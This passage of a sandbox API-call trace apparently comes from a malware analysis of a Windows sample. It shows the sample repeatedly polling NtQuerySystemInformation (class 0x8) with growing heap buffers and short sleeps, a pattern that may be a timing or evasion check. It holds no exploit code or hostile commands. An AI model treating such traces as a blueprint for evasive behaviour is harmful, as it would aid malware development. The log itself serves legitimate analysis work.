ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0272.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.878] Sleep (dwMilliseconds=0x110) [0272.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0272.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0272.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0272.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0272.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0272.895] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0272.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0272.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0272.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.897] Sleep (dwMilliseconds=0x110) [0272.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0272.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0272.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0272.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0272.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0272.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0272.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0272.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0272.912] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.913] Sleep (dwMilliseconds=0x110) [0272.943] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0272.943] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.944] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0272.944] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0272.944] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.944] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0272.944] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0272.944] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.945] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0272.945] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0272.945] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.945] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0272.945] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.946] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.946] Sleep (dwMilliseconds=0x110) [0272.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0272.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0272.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0272.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0272.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0272.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0272.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0272.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0272.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.954] Sleep (dwMilliseconds=0x110) [0272.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0272.991] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0272.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0272.991] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0272.995] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0272.995] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0272.996] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0272.996] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0272.996] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0272.996] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0272.996] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0272.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0272.998] Sleep (dwMilliseconds=0x110) [0273.027] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0273.027] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.028] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0273.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0273.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0273.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0273.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0273.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0273.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0273.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.035] Sleep (dwMilliseconds=0x110) [0273.044] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0273.044] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.044] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0273.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0273.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0273.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0273.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0273.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0273.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0273.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.051] Sleep (dwMilliseconds=0x110) [0273.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0273.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0273.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0273.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0273.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0273.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0273.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0273.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0273.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.066] Sleep (dwMilliseconds=0x110) [0273.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0273.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0273.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0273.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0273.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0273.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0273.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0273.084] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.086] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0273.086] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.087] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.087] Sleep (dwMilliseconds=0x110) [0273.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0273.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0273.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0273.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0273.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0273.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0273.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0273.130] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0273.131] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.132] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.132] Sleep (dwMilliseconds=0x110) [0273.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0273.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0273.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0273.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0273.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0273.145] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.148] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0273.148] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0273.148] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.149] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0273.149] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.149] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.149] Sleep (dwMilliseconds=0x110) [0273.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0273.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.153] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0273.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0273.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0273.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0273.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0273.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0273.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0273.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.155] Sleep (dwMilliseconds=0x110) [0273.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0273.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0273.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0273.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0273.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0273.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0273.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0273.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0273.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0273.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0273.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0273.176] Sleep (dwMilliseconds=0x110) [0273.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0273.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0273.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0273.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0273.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0273.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0273.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0273.192] RtlAllocateHeap (HeapHandle=0x2560000, 